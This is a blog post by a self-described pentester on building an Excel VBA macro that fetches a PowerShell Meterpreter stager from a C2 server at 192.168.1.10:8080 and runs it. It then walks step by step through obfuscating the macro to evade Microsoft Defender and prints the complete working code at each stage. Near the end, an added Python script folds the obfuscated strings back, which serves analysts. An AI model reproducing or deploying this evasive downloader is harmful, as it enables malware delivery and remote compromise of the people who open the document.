Malware Project - Almost Bypass MsDefender

Disclaimer: Hello! This is actually my first real macro, written while trying to obfuscate it and bypass Defender (sort of). This code will escape Defender, but the remote payload will not, since it was a Meterpreter PowerShell script; maybe in the next part 👨‍💻

 
Someone asked me to create a file containing a macro that downloads a malicious file while evading Defender! Here is my first attempt; it was cool, and I might create more with more elaborate code. Enjoy!

Raw Code, no obfuscation

First of all, before trying to obfuscate VBA code, you need working code!

Here is the code I used to download my payload from a C2 server:

Private Sub CommandButton1_Click()                  ' Click handler of an Excel ActiveX button
    DownloadFileFromURL                              ' Fetch the payload from the C2
    Dim myoutputfile As Integer                      ' These two variables are not actually used in the end 🤣
    Dim FilePath As String
    Shell ("powershell.exe -noexit .\\payload.ps1") ' Run the PowerShell payload (here a simple Meterpreter stager)
End Sub

Sub DownloadFileFromURL()
    Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP")    ' Windows COM objects: an HTTP request and a binary stream
    Set objADODBStream = CreateObject("ADODB.Stream")
    objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False  ' IP or URL of the C2, payload served as a .txt; False = synchronous request
    objXMLHTTP.Send
    objADODBStream.Type = 1                                ' adTypeBinary
    objADODBStream.Open
    objADODBStream.Write objXMLHTTP.responseBody
    objADODBStream.savetofile "payload.ps1", 2             ' adSaveCreateOverWrite: write the .txt out as a .ps1 in the current directory
End Sub

So, this is not big and fancy code, but it works! At this point Defender will beat the sh*t out of your file, so be careful!

First Stage - Non-sense Code

In this first stage I have working code, but I want to “lure” Defender by adding random, nonsensical code that does nothing at all.
Here I chose to use while loops everywhere, like this:

Dim t
t = 1
Do While t < 2
t = t + 1
Loop

Here is an example of what it looks like :

Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop

    DownloadFileFromURL
    Dim myoutputfile As Integer
    Dim FilePath As String
    Shell ("powershell.exe -noexit .\\payload.ps1")
End Sub

Sub DownloadFileFromURL()

Dim t,q,w,e,r,a,s
t = 1
Do While t < 5
t = t + 1
Loop

    Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP")
    Set objADODBStream = CreateObject("ADODB.Stream")
    objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False
    objXMLHTTP.Send
    objADODBStream.Type = 1
    objADODBStream.Open
    objADODBStream.Write objXMLHTTP.responseBody
    objADODBStream.savetofile "payload.ps1", 2
End Sub

This kind of junk code is also used to make reverse engineering of the malware harder for the analyst, although a dead loop like this is easy to spot and strip.

Second Stage - Obfuscate the Objects

While thinking about my code and a way to turn it into more garbage, I decided to hide the Microsoft objects called in the download function.

Calls like these are flagged as malicious almost automatically, since these objects are mostly used by malware, so I found a way to hide them in the code using the Replace() function.

Here is a simple Example

A = "Mic00000ft"
B = Replace(A,"00000","roso")

In this example, the variable B will contain “Microsoft”, since the “00000” is replaced by the missing part of the word, and B can then be used inside CreateObject().

Here is what it looks like (I used runs of 0 just to keep this code block readable, but you can use any random string, and that is better):

    q = "Mic00000000000000000000000000000ft"
    w = Replace(q,"00000000000000000000000000000","roso")
    e = "XM00000000000000000000000000000TP" 
    r = Replace(e,"00000000000000000000000000000","LHT")

    a = "AD00000000000000000000000000000B"
    s = Replace(a,"00000000000000000000000000000","OD")
    b = "St00000000000000000000000000000am"
    n = Replace(b,"00000000000000000000000000000","re")

    Set objXMLHTTP = CreateObject(w & "." & r)
    Set objADODBStream = CreateObject(s & "." & n)

Don’t forget to hide the URL as well:

    qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
    ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
    ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
    rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
    pp = "pay0000000000000000000d"
    kk = Replace(pp,"0000000000000000000","loa")

    objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
    objXMLHTTP.Send

Of course there are many other ways to hide data like this; I'm using the simplest one for now.

Hide that Shell !

One of the functions that most often triggers detection is the Shell command! But there are other ways to run a command without using it directly, for example the Run method of the WScript.Shell object:

Set Shell = CreateObject("WScript.Shell")
Shell.Run("whoami")

As with the previous objects, we use the same method to hide the WScript.Shell ProgID:

x = "WS0000000000000000000000000pt"
    c = Replace(x,"0000000000000000000000000","cri")
    v = "Sh0000000000000000000000000l"
    f = Replace(v,"0000000000000000000000000","el")

    Set Shell = CreateObject(c & "." & f)
    Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")

I also split the PowerShell command into pieces so it is not written directly in the script.

Last Stage - Random names

The final stage at this point is just to use random strings as function and variable names.
For that part I'm using an online tool called Code Protection; I just need to list all the names I want replaced in this code.

Here is the code without random strings:

Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop
    DownloadFileFromURL
    Dim myoutputfile As Integer
    Dim FilePath As String
    x = "WS0000000000000000000000000pt"
    c = Replace(x,"0000000000000000000000000","cri")
    v = "Sh0000000000000000000000000l"
    f = Replace(v,"0000000000000000000000000","el")
    Set Shell = CreateObject(c & "." & f)
    Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")
End Sub

Sub DownloadFileFromURL()
Dim t,q,w,e,r,a,s,b,n,qq,ww,ee,rr,pp,kk
t = 1
Do While t < 5
t = t + 1
Loop
    q = "Mic00000000000000000000000000000ft"
    w = Replace(q,"00000000000000000000000000000","roso")
    e = "XM00000000000000000000000000000TP" 
    r = Replace(e,"00000000000000000000000000000","LHT")
    a = "AD00000000000000000000000000000B"
    s = Replace(a,"00000000000000000000000000000","OD")
    b = "St00000000000000000000000000000am"
    n = Replace(b,"00000000000000000000000000000","re")
    Set objXMLHTTP = CreateObject(w & "." & r)
    Set objADODBStream = CreateObject(s & "." & n)
    qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
    ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
    ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
    rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
    pp = "pay0000000000000000000d"
    kk = Replace(pp,"0000000000000000000","loa")
    objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
    objXMLHTTP.Send
    objADODBStream.Type = 1
    objADODBStream.Open
    objADODBStream.Write objXMLHTTP.responseBody
    objADODBStream.savetofile "payload.ps1", 2
End Sub

And here is the final code with “full” obfuscation:

Private Sub CommandButton1_Click()
Dim nf7d7aafa614ae2e12b395d5df9ee4929,y5e2e19a97c2f321d8ce6e7ff6497d702,y701c18a7c7d41871239961947e31b2cd,ef34bc76f2d314271e34337eab2eb2cd2,qc0cc6e49592dec80416d6a3da9f01597,beb81d1e85adc52615465c469a1c20bab,xcd4143bfd53557b1234092d59353cfe5
nf7d7aafa614ae2e12b395d5df9ee4929 = 1
Do While nf7d7aafa614ae2e12b395d5df9ee4929 < 2
nf7d7aafa614ae2e12b395d5df9ee4929 = nf7d7aafa614ae2e12b395d5df9ee4929 + 1
Loop
t0894a182edb305bfc894f9a0d77ae549
Dim b8da5de0cf00af37347314a034ce6ac76 As Integer
Dim bcf9563044e940bcb370186ece0207409 As String
y5e2e19a97c2f321d8ce6e7ff6497d702 = "WS0000000000000000000000000pt"
y701c18a7c7d41871239961947e31b2cd = Replace(y5e2e19a97c2f321d8ce6e7ff6497d702,"0000000000000000000000000","cri")
ef34bc76f2d314271e34337eab2eb2cd2 = "Sh0000000000000000000000000l"
qc0cc6e49592dec80416d6a3da9f01597 = Replace(ef34bc76f2d314271e34337eab2eb2cd2,"0000000000000000000000000","el")
Set qe46fdc45ae3a5515584f4d44a8b8b2df = CreateObject(y701c18a7c7d41871239961947e31b2cd & "." & qc0cc6e49592dec80416d6a3da9f01597)
qe46fdc45ae3a5515584f4d44a8b8b2df.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")
End Sub
Sub t0894a182edb305bfc894f9a0d77ae549()
Dim e97b8956a358b260b24afd06d64494c4d,yffcbe4af74f35a61ac88aaa0d41c9d86,e1c09f164c1c3bf60b15c09b54cf7a8b8,e5c068c60001ee2d4009beea3ad32b6e1,nfe31c02a86912d80a6cceb7de2c789ec,c17fea5c0191a5bc3c2640b8f16b14e98,y560c5fa7e5f4ddabb1dea7096c30fbb3,ea06f6764676da2a53039a8c582369215,vd788acd2ab98604acf912471d7b2c47d,ec8a6296f4b0f1b2953f0f43b25d28c20,bed6dad1b0c47ef9d6216c7e497e4fe06,q2df3664a88d9cc00cc1292b9cfc38a51,b860812e2b3f298fda368e6ddfcab2411,x3a75ddb3e3822fdc37a0501d9420704e,r69ab3e7a1c107402489ab3fd7b058463
e97b8956a358b260b24afd06d64494c4d = 1
Do While e97b8956a358b260b24afd06d64494c4d < 5
e97b8956a358b260b24afd06d64494c4d = e97b8956a358b260b24afd06d64494c4d + 1
Loop
yffcbe4af74f35a61ac88aaa0d41c9d86 = "Mic00000000000000000000000000000ft"
e1c09f164c1c3bf60b15c09b54cf7a8b8 = Replace(yffcbe4af74f35a61ac88aaa0d41c9d86,"00000000000000000000000000000","roso")
e5c068c60001ee2d4009beea3ad32b6e1 = "XM00000000000000000000000000000TP"
nfe31c02a86912d80a6cceb7de2c789ec = Replace(e5c068c60001ee2d4009beea3ad32b6e1,"00000000000000000000000000000","LHT")
c17fea5c0191a5bc3c2640b8f16b14e98 = "AD00000000000000000000000000000B"
y560c5fa7e5f4ddabb1dea7096c30fbb3 = Replace(c17fea5c0191a5bc3c2640b8f16b14e98,"00000000000000000000000000000","OD")
ea06f6764676da2a53039a8c582369215 = "St00000000000000000000000000000am"
vd788acd2ab98604acf912471d7b2c47d = Replace(ea06f6764676da2a53039a8c582369215,"00000000000000000000000000000","re")
Set q7089b94b9f9e338b5cdc57f6a3245c47 = CreateObject(e1c09f164c1c3bf60b15c09b54cf7a8b8 & "." & nfe31c02a86912d80a6cceb7de2c789ec)
Set r6deb5e78454a0af561242cf3d291aa21 = CreateObject(y560c5fa7e5f4ddabb1dea7096c30fbb3 & "." & vd788acd2ab98604acf912471d7b2c47d)
ec8a6296f4b0f1b2953f0f43b25d28c20 = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
bed6dad1b0c47ef9d6216c7e497e4fe06 = Replace(ec8a6296f4b0f1b2953f0f43b25d28c20,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
q2df3664a88d9cc00cc1292b9cfc38a51 = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
b860812e2b3f298fda368e6ddfcab2411 = Replace(q2df3664a88d9cc00cc1292b9cfc38a51,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
x3a75ddb3e3822fdc37a0501d9420704e = "pay0000000000000000000d"
r69ab3e7a1c107402489ab3fd7b058463 = Replace(x3a75ddb3e3822fdc37a0501d9420704e,"0000000000000000000","loa")
q7089b94b9f9e338b5cdc57f6a3245c47.Open "GET", "http://" & bed6dad1b0c47ef9d6216c7e497e4fe06 & ":" & b860812e2b3f298fda368e6ddfcab2411 & "/" & r69ab3e7a1c107402489ab3fd7b058463 & ".txt", False
q7089b94b9f9e338b5cdc57f6a3245c47.Send
r6deb5e78454a0af561242cf3d291aa21.Type = 1
r6deb5e78454a0af561242cf3d291aa21.Open
r6deb5e78454a0af561242cf3d291aa21.Write q7089b94b9f9e338b5cdc57f6a3245c47.responseBody
r6deb5e78454a0af561242cf3d291aa21.savetofile "payload.ps1", 2
End Sub
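Everything the three stages above hide (the Replace() wrapped ProgIDs and URL from the second stage, the split PowerShell command from “Hide that Shell”, and the random names of the final code) is resolved at compile time from constants sitting in the macro itself. That is why an analyst can undo it with a single constant-folding pass, and why it mainly helps against a static scan of the document: Office's AMSI integration for VBA reports the resolved arguments of calls such as CreateObject and Run to the antivirus at runtime, after Replace() and & have done their work. The script below is an added example written for this page, not code from the post or from any tool it mentions. It is in Python (the language analysts' VBA tooling such as olevba is written in) and folds every string assignment, Replace() call and & concatenation in the macro text, then reports the resolved ProgIDs, URL, written file and command. Identifier names are irrelevant to it, so the renamed final code resolves exactly like the readable one. SAMPLE_VBA is a constructed copy of the post's macro with the long 000… filler cut down to ### and a single backslash in the PowerShell path.

```python
import re

_TOKEN = re.compile(r'\s*(?:"((?:[^"]|"")*)"|([A-Za-z_]\w*|\d+)|([&(),]))')   # literal | name/number | punctuation
_ASSIGN = re.compile(r'^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(?:CreateObject\s*\((.*)\)\s*|(.+))$', re.I)
_CALL = re.compile(r'^(?:[A-Za-z_]\w*\.)?([A-Za-z_]\w*)\s*(.*)$')                 # [obj.]Method args...

def _tokenize(expr):
    tokens, pos, expr = [], 0, expr.rstrip()
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if not m:
            raise SyntaxError(expr[pos:])              # +, <, = and friends: not a string expression
        lit, name, punct = m.groups()
        tokens.append(('str', lit.replace('""', '"')) if lit is not None else      # "" escapes a quote
                      ('id', name.lower()) if name else ('p', punct))              # names are case-insensitive
        pos = m.end()
    return tokens + [(None, None)]                     # end marker, so the parsers can always peek

def fold_args(text, env):
    """Constant-fold a VBA argument list: each item becomes a str, or None if it needs runtime state.
    args := expr (',' expr)*   expr := primary ('&' primary)*   primary := string | name | Replace(a,b,c) | '(' expr ')'"""
    try:
        toks, i = _tokenize(text), [0]                 # i is the cursor shared by the nested parsers
    except SyntaxError:
        return []
    def take():
        i[0] += 1
        return toks[i[0] - 1]
    def arglist():
        args = [expr()]
        while toks[i[0]] == ('p', ','):
            i[0] += 1
            args.append(expr())
        return args
    def expr():
        val = primary()
        while toks[i[0]] == ('p', '&'):
            i[0] += 1
            rhs = primary()
            val = None if val is None or rhs is None else val + rhs
        return val
    def primary():
        kind, text = take()
        if kind == 'str':
            return text
        if kind == 'id' and text != 'replace':
            return env.get(text)                       # unassigned name, number or keyword: unknown statically
        if kind == 'id' and take() == ('p', '('):      # Replace(expression, find, replacewith), binary compare
            a = arglist()
            val = a[0].replace(a[1], a[2]) if len(a) == 3 and None not in a else None
        elif (kind, text) == ('p', '('):
            val = expr()
        else:
            raise SyntaxError(str(text))
        if take() != ('p', ')'):
            raise SyntaxError('expected )')
        return val
    try:
        args = arglist()
        return args if toks[i[0]] == (None, None) else []
    except (SyntaxError, IndexError):
        return []

def fold(text, env):
    return (fold_args(text, env) or [None])[0]        # single expression; None when not a compile-time string

def deobfuscate(vba):
    """One pass over straight-line VBA with one flat scope: what it creates, fetches, writes and runs."""
    env, found = {}, {'objects': [], 'urls': [], 'files': [], 'commands': []}
    for line in (raw.strip() for raw in vba.splitlines()):
        if (m := _ASSIGN.match(line)) and m.group(2) is not None:       # Set x = CreateObject(progid)
            found['objects'].append((m.group(1).lower(), fold(m.group(2), env)))
        elif m:                                                         # x = <string expression>
            val = fold(m.group(3), env)
            if val is not None:
                env[m.group(1).lower()] = val
        elif m := _CALL.match(line):
            meth, args = m.group(1).lower(), fold_args(m.group(2), env)
            if meth == 'open' and len(args) > 1 and args[1]:
                found['urls'].append(args[1])          # XMLHTTP.Open "GET", url, False
            elif meth == 'savetofile' and args and args[0]:
                found['files'].append(args[0])         # ADODB.Stream.SaveToFile path, 2
            elif meth in ('run', 'shell') and args and args[0]:
                found['commands'].append(args[0])      # WScript.Shell.Run cmd, or the VBA Shell function
    return found

# Constructed sample: the post's macro with the "000..." filler cut to "###" and a single backslash in the path.
SAMPLE_VBA = r'''
Private Sub CommandButton1_Click()
    q = "Mic###ft"
    w = Replace(q,"###","roso")
    Set objXMLHTTP = CreateObject(w & "." & Replace("XM###TP","###","LHT"))
    Set objADODBStream = CreateObject(Replace("AD###B","###","OD") & "." & Replace("St###am","###","re"))
    objXMLHTTP.Open "GET", "http://" & Replace("192.###.10","###","168.1") & ":" & Replace("80###0","###","8") & "/pay" & "load.txt", False
    objADODBStream.savetofile "payload.ps1", 2
    Set Shell = CreateObject(Replace("WS###pt","###","cri") & "." & Replace("Sh###l","###","el"))
    Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\pa" & "yloa" & "d.ps1")
End Sub
'''
```

Calling deobfuscate(SAMPLE_VBA) returns Microsoft.XMLHTTP, ADODB.Stream and WScript.Shell as the created objects, http://192.168.1.10:8080/payload.txt as the URL, payload.ps1 as the written file and the full powershell.exe command line; for a real document, feed it the module source extracted with olevba. It is a single-pass folder for the straight-line style shown on this page (one flat scope, no comments, no control flow), not a general VBA interpreter: the junk loops of the first stage simply fall through as unresolvable lines, and anything that depends on a runtime value comes back as None instead of a guess.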

Hope you enjoyed this little post. I'll try to write a next part on the “evasion” of the last stage, the execution of the reverse shell!

Thanks !

This article was updated on 15 August 2023

AlrikRr

Formerly a firefighter in France 🇫🇷 🚒, I decided to pursue my passion for IT and especially offensive cybersecurity. Now a Pentester in Montreal 🇨🇦 for almost 3 years and an active member of HackersWithoutBorders North America, I am gradually specializing in internal and network intrusion testing.

Sharing our passion for this field, whether for awareness or education, is an important mission for me!

Feel free to contact me to discuss cyber or anything else over a beer :D 🍻